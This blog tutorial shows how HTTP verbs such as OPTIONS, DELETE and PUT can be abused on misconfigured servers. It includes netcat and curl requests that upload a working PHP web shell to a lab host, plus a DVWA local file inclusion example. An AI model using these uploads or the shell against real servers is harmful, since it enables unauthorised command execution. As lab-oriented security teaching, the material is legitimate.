The HTTP protocol comprises of the following verbs or methods.
I assume you are well aware of these, you can read more about them in detail from this RFC document.
I will show some interesting HTTP verbs which can be used to break into servers. Well, these attacks can be very rare but thought of sharing 🙂
The OPTIONS verb is enabled in the server it can be used to view all the HTTP methods configured.
% nc localhost 80 OPTIONS / HTTP/1.0 HTTP/1.1 200 OK Allow: OPTIONS, TRACE, GET, HEAD, POST Server: Microsoft-IIS/7.5 Public: OPTIONS, TRACE, GET, HEAD, POST X-Powered-By: ASP.NET Date: Sun, 14 Jun 2015 05:31:10 GMT Connection: close
The DELETE verb is a dangerous verb and can be misused. If this is misconfigured, can be use to delete resources from the web server.
% nc localhost 80 DELETE /location/resource HTTP/1.0 Date: Sun, 14 Jun 2015 05:01:22 GMT Server: Apache/2.2.3 (CentOS) X-Powered-By: PHP/5.1.6 Set-Cookie: PHPSESSID=ete39c4b0uk83phvucj1ftbsn5; expires=Mon, 15 Jun 2015 05:01:22 GMT; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Connection: close Content-Type: text/html; charset=UTF-8
This verb can be used to upload a resource into the server. This is also a risky verb if not configured applicably. For example suppose we want to write “<?php echo ‘Hello World’; ?>” in a new file as “hello.php”. Make sure you give the correct length of your payload.
% cat -e hello.php <?php echo 'Hello World'; ?>$ % wc -m hello.php 29 hello.php % nc localhost 80 PUT /hello.php HTTP/1.0 Content-Type: text/html Content-Length: 29 <?php echo 'Hello World'; ?>
PUT verb in PHP
PHP has the support for the PUT verb. This is a sample program which will receive the data from the PUT request and save it as “myfile”.
<?php $putdata = fopen("php://input", "r"); $fp = fopen("myfile", "w"); while ($data = fread($putdata, 1024)) fwrite($fp, $data); fclose($fp); fclose($putdata); ?>
I will save this as “put.php” in my root directory of the web server.
Now we can request “put.php” using the PUT verb and send our payload.
% cat -e phpinfo.php <?php phpinfo(); ?>$ % wc -m phpinfo.php 20 phpinfo.php % nc 192.168.1.5 80 PUT /put.php HTTP/1.0 Content-Type: text/html Content-Length: 20 <?php phpinfo(); ?> HTTP/1.1 200 OK Date: Mon, 15 Jun 2015 06:48:16 GMT Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22 X-Powered-By: PHP/5.4.22 Content-Length: 0 Connection: close Content-Type: text/html
Now if you view “myfile” our payload should be nice written.
Suppose you have a local file inclusion situation, in cases like that we can include our newly written file using PUT
This is an example of local file inclusion. I’ll be using DVWA to demonstrate this.
<?php echo "File included: ".$_REQUEST["page"]."<br>"; $file = $_REQUEST["page"]; include $file; ?>
Suppose we want to upload a simple web shell we can do it like the following 😉
% wc -m shell.php 189 shell.php % nc 192.168.1.5 80 PUT /put.php HTTP/1.0 Content-Type: text/html Content-Length: 189 <?php print '<form method="post"> Command: <input type="text" name="__"><br> <input type="submit"> </form>'; if(isset($_POST["__"])) print '<pre>'.shell_exec($_POST["__"]).'</pre>'; ?> HTTP/1.1 200 OK Date: Mon, 15 Jun 2015 07:39:42 GMT Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22 X-Powered-By: PHP/5.4.22 Content-Length: 0 Connection: close Content-Type: text/html
You can also use curl to upload a file using PUT easily.
% curl http://192.168.1.5/put.php --upload-file shell.php -v * About to connect() to 192.168.1.5 port 80 (#0) * Trying 192.168.1.5... * connected * Connected to 192.168.1.5 (192.168.1.5) port 80 (#0) > PUT /put.php HTTP/1.1 > User-Agent: curl/7.26.0 > Host: 192.168.1.5 > Accept: */* > Content-Length: 189 > Expect: 100-continue > * additional stuff not fine transfer.c:1037: 0 0 * HTTP 1.1 or later with persistent connection, pipelining supported < HTTP/1.1 100 Continue * additional stuff not fine transfer.c:1037: 0 0 * We are completely uploaded and fine * HTTP 1.1 or later with persistent connection, pipelining supported < HTTP/1.1 200 OK < Date: Mon, 15 Jun 2015 07:47:44 GMT < Server: Apache/2.4.7 (Win32) OpenSSL/0.9.8y PHP/5.4.22 < X-Powered-By: PHP/5.4.22 < Content-Length: 0 < Content-Type: text/html < * Connection #0 to host 192.168.1.5 left intact * Closing connection #0
Thanks for reading !